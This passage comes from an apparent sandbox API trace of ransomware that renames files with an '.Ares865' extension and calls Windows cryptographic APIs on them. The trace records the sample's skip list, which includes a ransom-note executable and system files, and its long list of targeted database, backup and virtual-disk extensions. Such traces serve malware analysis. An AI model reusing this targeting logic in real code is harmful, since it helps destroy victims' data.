users\\microsoft\\user account pictures\\default pictures\\usertile20.bmp.ares865"), dwFlags=0x1) returned 1 [0084.849] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile20.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0084.849] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0084.849] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0084.850] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0084.850] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0084.850] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0084.851] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0084.851] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.851] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0084.852] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0084.857] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0084.858] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0084.858] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.858] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0084.858] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0084.858] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0084.858] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0084.858] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0084.858] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0084.858] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0084.858] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0084.858] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0084.859] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0084.859] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0084.859] CloseHandle (hObject=0x15c) returned 1 [0084.859] CloseHandle (hObject=0x118) returned 1 [0084.859] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0084.859] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0084.859] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0084.860] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3a60b9, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3a60b9, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd069f3f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile21.bmp", cAlternateFileName="")) returned 1 [0084.860] lstrcmpiW (lpString1="usertile21.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0084.860] lstrcmpiW (lpString1="usertile21.bmp", lpString2="aoldtz.exe") returned 1 [0084.860] lstrcmpiW (lpString1="usertile21.bmp", lpString2=".") returned 1 [0084.860] lstrcmpiW (lpString1="usertile21.bmp", lpString2="..") returned 1 [0084.860] lstrcmpiW (lpString1="usertile21.bmp", lpString2="windows") returned -1 [0084.860] lstrcmpiW (lpString1="usertile21.bmp", lpString2="bootmgr") returned 1 [0084.860] lstrcmpiW (lpString1="usertile21.bmp", lpString2="temp") returned 1 [0084.860] lstrcmpiW (lpString1="usertile21.bmp", lpString2="pagefile.sys") returned 1 [0084.860] lstrcmpiW (lpString1="usertile21.bmp", lpString2="boot") returned 1 [0084.860] lstrcmpiW (lpString1="usertile21.bmp", lpString2="ids.txt") returned 1 [0084.860] lstrcmpiW (lpString1="usertile21.bmp", lpString2="ntuser.dat") returned 1 [0084.860] lstrcmpiW (lpString1="usertile21.bmp", lpString2="perflogs") returned 1 [0084.860] lstrcmpiW (lpString1="usertile21.bmp", lpString2="MSBuild") returned 1 [0084.860] lstrlenW (lpString="usertile21.bmp") returned 14 [0084.860] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp") returned 82 [0084.860] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile21.bmp" | out: lpString1="usertile21.bmp") returned="usertile21.bmp" [0084.860] lstrlenW (lpString="usertile21.bmp") returned 14 [0084.860] lstrlenW (lpString="Ares865") returned 7 [0084.860] lstrcmpiW (lpString1="e21.bmp", lpString2="Ares865") returned 1 [0084.860] lstrlenW (lpString=".dll") returned 4 [0084.860] lstrcmpiW (lpString1="usertile21.bmp", lpString2=".dll") returned 1 [0084.860] lstrlenW (lpString=".lnk") returned 4 [0084.860] lstrcmpiW (lpString1="usertile21.bmp", lpString2=".lnk") returned 1 [0084.860] lstrlenW (lpString=".ini") returned 4 [0084.860] lstrcmpiW (lpString1="usertile21.bmp", lpString2=".ini") returned 1 [0084.860] lstrlenW (lpString=".sys") returned 4 [0084.860] lstrcmpiW (lpString1="usertile21.bmp", lpString2=".sys") returned 1 [0084.860] lstrlenW (lpString="usertile21.bmp") returned 14 [0084.860] lstrlenW (lpString="bak") returned 3 [0084.860] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0084.860] lstrlenW (lpString="ba_") returned 3 [0084.860] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0084.860] lstrlenW (lpString="dbb") returned 3 [0084.861] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0084.861] lstrlenW (lpString="vmdk") returned 4 [0084.861] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0084.861] lstrlenW (lpString="rar") returned 3 [0084.861] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0084.861] lstrlenW (lpString="zip") returned 3 [0084.861] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0084.861] lstrlenW (lpString="tgz") returned 3 [0084.861] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0084.861] lstrlenW (lpString="vbox") returned 4 [0084.861] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0084.861] lstrlenW (lpString="vdi") returned 3 [0084.861] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0084.861] lstrlenW (lpString="vhd") returned 3 [0084.861] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0084.861] lstrlenW (lpString="vhdx") returned 4 [0084.861] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0084.861] lstrlenW (lpString="avhd") returned 4 [0084.861] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0084.861] lstrlenW (lpString="db") returned 2 [0084.861] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0084.861] lstrlenW (lpString="db2") returned 3 [0084.861] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0084.861] lstrlenW (lpString="db3") returned 3 [0084.861] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0084.861] lstrlenW (lpString="dbf") returned 3 [0084.861] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0084.861] lstrlenW (lpString="mdf") returned 3 [0084.861] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0084.861] lstrlenW (lpString="mdb") returned 3 [0084.861] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0084.861] lstrlenW (lpString="sql") returned 3 [0084.861] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0084.861] lstrlenW (lpString="sqlite") returned 6 [0084.861] lstrcmpiW (lpString1="21.bmp", lpString2="sqlite") returned -1 [0084.861] lstrlenW (lpString="sqlite3") returned 7 [0084.861] lstrcmpiW (lpString1="e21.bmp", lpString2="sqlite3") returned -1 [0084.861] lstrlenW (lpString="sqlitedb") returned 8 [0084.862] lstrcmpiW (lpString1="le21.bmp", lpString2="sqlitedb") returned -1 [0084.862] lstrlenW (lpString="xml") returned 3 [0084.862] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0084.862] lstrlenW (lpString="$er") returned 3 [0084.862] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0084.862] lstrlenW (lpString="4dd") returned 3 [0084.862] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0084.862] lstrlenW (lpString="4dl") returned 3 [0084.862] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0084.862] lstrlenW (lpString="^^^") returned 3 [0084.862] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0084.862] lstrlenW (lpString="abs") returned 3 [0084.862] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0084.862] lstrlenW (lpString="abx") returned 3 [0084.862] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0084.862] lstrlenW (lpString="accdb") returned 5 [0084.862] lstrcmpiW (lpString1="1.bmp", lpString2="accdb") returned -1 [0084.862] lstrlenW (lpString="accdc") returned 5 [0084.862] lstrcmpiW (lpString1="1.bmp", lpString2="accdc") returned -1 [0084.862] lstrlenW (lpString="accde") returned 5 [0084.862] lstrcmpiW (lpString1="1.bmp", lpString2="accde") returned -1 [0084.862] lstrlenW (lpString="accdr") returned 5 [0084.862] lstrcmpiW (lpString1="1.bmp", lpString2="accdr") returned -1 [0084.862] lstrlenW (lpString="accdt") returned 5 [0084.862] lstrcmpiW (lpString1="1.bmp", lpString2="accdt") returned -1 [0084.862] lstrlenW (lpString="accdw") returned 5 [0084.862] lstrcmpiW (lpString1="1.bmp", lpString2="accdw") returned -1 [0084.862] lstrlenW (lpString="accft") returned 5 [0084.862] lstrcmpiW (lpString1="1.bmp", lpString2="accft") returned -1 [0084.862] lstrlenW (lpString="adb") returned 3 [0084.862] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.862] lstrlenW (lpString="adb") returned 3 [0084.862] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.862] lstrlenW (lpString="ade") returned 3 [0084.862] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0084.862] lstrlenW (lpString="adf") returned 3 [0084.862] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0084.862] lstrlenW (lpString="adn") returned 3 [0084.863] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0084.863] lstrlenW (lpString="adp") returned 3 [0084.863] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0084.863] lstrlenW (lpString="alf") returned 3 [0084.863] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0084.863] lstrlenW (lpString="ask") returned 3 [0084.863] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0084.863] lstrlenW (lpString="btr") returned 3 [0084.863] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0084.863] lstrlenW (lpString="cat") returned 3 [0084.863] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0084.863] lstrlenW (lpString="cdb") returned 3 [0084.863] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0084.863] lstrlenW (lpString="ckp") returned 3 [0084.863] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0084.863] lstrlenW (lpString="cma") returned 3 [0084.863] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0084.863] lstrlenW (lpString="cpd") returned 3 [0084.863] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0084.863] lstrlenW (lpString="dacpac") returned 6 [0084.863] lstrcmpiW (lpString1="21.bmp", lpString2="dacpac") returned -1 [0084.863] lstrlenW (lpString="dad") returned 3 [0084.863] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0084.863] lstrlenW (lpString="dadiagrams") returned 10 [0084.863] lstrcmpiW (lpString1="tile21.bmp", lpString2="dadiagrams") returned 1 [0084.863] lstrlenW (lpString="daschema") returned 8 [0084.863] lstrcmpiW (lpString1="le21.bmp", lpString2="daschema") returned 1 [0084.863] lstrlenW (lpString="db-journal") returned 10 [0084.863] lstrcmpiW (lpString1="tile21.bmp", lpString2="db-journal") returned 1 [0084.863] lstrlenW (lpString="db-shm") returned 6 [0084.863] lstrcmpiW (lpString1="21.bmp", lpString2="db-shm") returned -1 [0084.863] lstrlenW (lpString="db-wal") returned 6 [0084.863] lstrcmpiW (lpString1="21.bmp", lpString2="db-wal") returned -1 [0084.863] lstrlenW (lpString="dbc") returned 3 [0084.863] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0084.863] lstrlenW (lpString="dbs") returned 3 [0084.863] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0084.863] lstrlenW (lpString="dbt") returned 3 [0084.864] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0084.864] lstrlenW (lpString="dbv") returned 3 [0084.864] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0084.864] lstrlenW (lpString="dbx") returned 3 [0084.864] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0084.864] lstrlenW (lpString="dcb") returned 3 [0084.864] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0084.864] lstrlenW (lpString="dct") returned 3 [0084.864] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0084.864] lstrlenW (lpString="dcx") returned 3 [0084.864] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0084.864] lstrlenW (lpString="ddl") returned 3 [0084.864] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0084.864] lstrlenW (lpString="dlis") returned 4 [0084.864] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0084.864] lstrlenW (lpString="dp1") returned 3 [0084.864] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0084.864] lstrlenW (lpString="dqy") returned 3 [0084.864] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0084.864] lstrlenW (lpString="dsk") returned 3 [0084.864] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0084.864] lstrlenW (lpString="dsn") returned 3 [0084.864] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0084.864] lstrlenW (lpString="dtsx") returned 4 [0084.864] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0084.864] lstrlenW (lpString="dxl") returned 3 [0084.864] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0084.864] lstrlenW (lpString="eco") returned 3 [0084.864] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0084.864] lstrlenW (lpString="ecx") returned 3 [0084.864] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0084.864] lstrlenW (lpString="edb") returned 3 [0084.864] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0084.864] lstrlenW (lpString="epim") returned 4 [0084.864] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0084.864] lstrlenW (lpString="fcd") returned 3 [0084.864] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0084.864] lstrlenW (lpString="fdb") returned 3 [0084.864] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0084.865] lstrlenW (lpString="fic") returned 3 [0084.865] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0084.865] lstrlenW (lpString="flexolibrary") returned 12 [0084.865] lstrcmpiW (lpString1="ertile21.bmp", lpString2="flexolibrary") returned -1 [0084.865] lstrlenW (lpString="fm5") returned 3 [0084.865] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0084.865] lstrlenW (lpString="fmp") returned 3 [0084.865] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0084.865] lstrlenW (lpString="fmp12") returned 5 [0084.865] lstrcmpiW (lpString1="1.bmp", lpString2="fmp12") returned -1 [0084.865] lstrlenW (lpString="fmpsl") returned 5 [0084.865] lstrcmpiW (lpString1="1.bmp", lpString2="fmpsl") returned -1 [0084.865] lstrlenW (lpString="fol") returned 3 [0084.865] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0084.865] lstrlenW (lpString="fp3") returned 3 [0084.865] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0084.865] lstrlenW (lpString="fp4") returned 3 [0084.865] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0084.865] lstrlenW (lpString="fp5") returned 3 [0084.865] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0084.865] lstrlenW (lpString="fp7") returned 3 [0084.865] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0084.865] lstrlenW (lpString="fpt") returned 3 [0084.865] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0084.865] lstrlenW (lpString="frm") returned 3 [0084.865] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0084.865] lstrlenW (lpString="gdb") returned 3 [0084.865] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.865] lstrlenW (lpString="gdb") returned 3 [0084.865] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.865] lstrlenW (lpString="grdb") returned 4 [0084.865] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0084.865] lstrlenW (lpString="gwi") returned 3 [0084.865] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0084.865] lstrlenW (lpString="hdb") returned 3 [0084.865] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0084.865] lstrlenW (lpString="his") returned 3 [0084.865] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0084.866] lstrlenW (lpString="ib") returned 2 [0084.866] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0084.866] lstrlenW (lpString="idb") returned 3 [0084.866] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0084.866] lstrlenW (lpString="ihx") returned 3 [0084.866] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0084.866] lstrlenW (lpString="itdb") returned 4 [0084.866] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0084.866] lstrlenW (lpString="itw") returned 3 [0084.866] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0084.866] lstrlenW (lpString="jet") returned 3 [0084.866] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0084.866] lstrlenW (lpString="jtx") returned 3 [0084.866] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0084.866] lstrlenW (lpString="kdb") returned 3 [0084.866] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0084.866] lstrlenW (lpString="kexi") returned 4 [0084.866] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0084.866] lstrlenW (lpString="kexic") returned 5 [0084.866] lstrcmpiW (lpString1="1.bmp", lpString2="kexic") returned -1 [0084.866] lstrlenW (lpString="kexis") returned 5 [0084.866] lstrcmpiW (lpString1="1.bmp", lpString2="kexis") returned -1 [0084.866] lstrlenW (lpString="lgc") returned 3 [0084.866] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0084.866] lstrlenW (lpString="lwx") returned 3 [0084.866] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0084.866] lstrlenW (lpString="maf") returned 3 [0084.866] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0084.866] lstrlenW (lpString="maq") returned 3 [0084.866] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0084.866] lstrlenW (lpString="mar") returned 3 [0084.866] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0084.866] lstrlenW (lpString="marshal") returned 7 [0084.866] lstrcmpiW (lpString1="e21.bmp", lpString2="marshal") returned -1 [0084.866] lstrlenW (lpString="mas") returned 3 [0084.866] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0084.866] lstrlenW (lpString="mav") returned 3 [0084.866] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0084.867] lstrlenW (lpString="maw") returned 3 [0084.867] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0084.867] lstrlenW (lpString="mdbhtml") returned 7 [0084.867] lstrcmpiW (lpString1="e21.bmp", lpString2="mdbhtml") returned -1 [0084.867] lstrlenW (lpString="mdn") returned 3 [0084.867] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0084.867] lstrlenW (lpString="mdt") returned 3 [0084.867] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0084.867] lstrlenW (lpString="mfd") returned 3 [0084.867] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0084.867] lstrlenW (lpString="mpd") returned 3 [0084.867] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0084.867] lstrlenW (lpString="mrg") returned 3 [0084.867] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0084.867] lstrlenW (lpString="mud") returned 3 [0084.867] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0084.867] lstrlenW (lpString="mwb") returned 3 [0084.867] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0084.867] lstrlenW (lpString="myd") returned 3 [0084.867] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0084.867] lstrlenW (lpString="ndf") returned 3 [0084.867] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0084.867] lstrlenW (lpString="nnt") returned 3 [0084.867] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0084.867] lstrlenW (lpString="nrmlib") returned 6 [0084.867] lstrcmpiW (lpString1="21.bmp", lpString2="nrmlib") returned -1 [0084.867] lstrlenW (lpString="ns2") returned 3 [0084.867] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0084.867] lstrlenW (lpString="ns3") returned 3 [0084.867] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0084.867] lstrlenW (lpString="ns4") returned 3 [0084.867] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0084.867] lstrlenW (lpString="nsf") returned 3 [0084.867] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0084.867] lstrlenW (lpString="nv") returned 2 [0084.867] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0084.867] lstrlenW (lpString="nv2") returned 3 [0084.867] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0084.868] lstrlenW (lpString="nwdb") returned 4 [0084.868] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0084.868] lstrlenW (lpString="nyf") returned 3 [0084.868] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0084.868] lstrlenW (lpString="odb") returned 3 [0084.868] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.868] lstrlenW (lpString="odb") returned 3 [0084.868] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.868] lstrlenW (lpString="oqy") returned 3 [0084.868] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0084.868] lstrlenW (lpString="ora") returned 3 [0084.868] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0084.868] lstrlenW (lpString="orx") returned 3 [0084.868] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0084.868] lstrlenW (lpString="owc") returned 3 [0084.868] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0084.868] lstrlenW (lpString="p96") returned 3 [0084.868] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0084.868] lstrlenW (lpString="p97") returned 3 [0084.868] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0084.868] lstrlenW (lpString="pan") returned 3 [0084.868] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0084.868] lstrlenW (lpString="pdb") returned 3 [0084.868] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0084.868] lstrlenW (lpString="pdm") returned 3 [0084.868] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0084.868] lstrlenW (lpString="pnz") returned 3 [0084.868] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0084.868] lstrlenW (lpString="qry") returned 3 [0084.868] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0084.868] lstrlenW (lpString="qvd") returned 3 [0084.868] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0084.868] lstrlenW (lpString="rbf") returned 3 [0084.868] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0084.868] lstrlenW (lpString="rctd") returned 4 [0084.868] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0084.868] lstrlenW (lpString="rod") returned 3 [0084.868] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0084.869] lstrlenW (lpString="rodx") returned 4 [0084.869] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0084.869] lstrlenW (lpString="rpd") returned 3 [0084.869] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0084.869] lstrlenW (lpString="rsd") returned 3 [0084.869] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0084.869] lstrlenW (lpString="sas7bdat") returned 8 [0084.869] lstrcmpiW (lpString1="le21.bmp", lpString2="sas7bdat") returned -1 [0084.869] lstrlenW (lpString="sbf") returned 3 [0084.869] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0084.869] lstrlenW (lpString="scx") returned 3 [0084.869] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0084.869] lstrlenW (lpString="sdb") returned 3 [0084.869] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0084.869] lstrlenW (lpString="sdc") returned 3 [0084.869] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0084.869] lstrlenW (lpString="sdf") returned 3 [0084.869] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0084.869] lstrlenW (lpString="sis") returned 3 [0084.869] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0084.869] lstrlenW (lpString="spq") returned 3 [0084.869] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0084.869] lstrlenW (lpString="te") returned 2 [0084.869] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0084.869] lstrlenW (lpString="teacher") returned 7 [0084.869] lstrcmpiW (lpString1="e21.bmp", lpString2="teacher") returned -1 [0084.869] lstrlenW (lpString="tmd") returned 3 [0084.869] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0084.869] lstrlenW (lpString="tps") returned 3 [0084.869] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0084.869] lstrlenW (lpString="trc") returned 3 [0084.869] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.869] lstrlenW (lpString="trc") returned 3 [0084.869] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.869] lstrlenW (lpString="trm") returned 3 [0084.869] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0084.869] lstrlenW (lpString="udb") returned 3 [0084.869] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0084.870] lstrlenW (lpString="udl") returned 3 [0084.870] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0084.870] lstrlenW (lpString="usr") returned 3 [0084.870] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0084.870] lstrlenW (lpString="v12") returned 3 [0084.870] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0084.870] lstrlenW (lpString="vis") returned 3 [0084.870] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0084.870] lstrlenW (lpString="vpd") returned 3 [0084.870] lstrcmpiW (lpString1="bmp", lpString2="vpd") 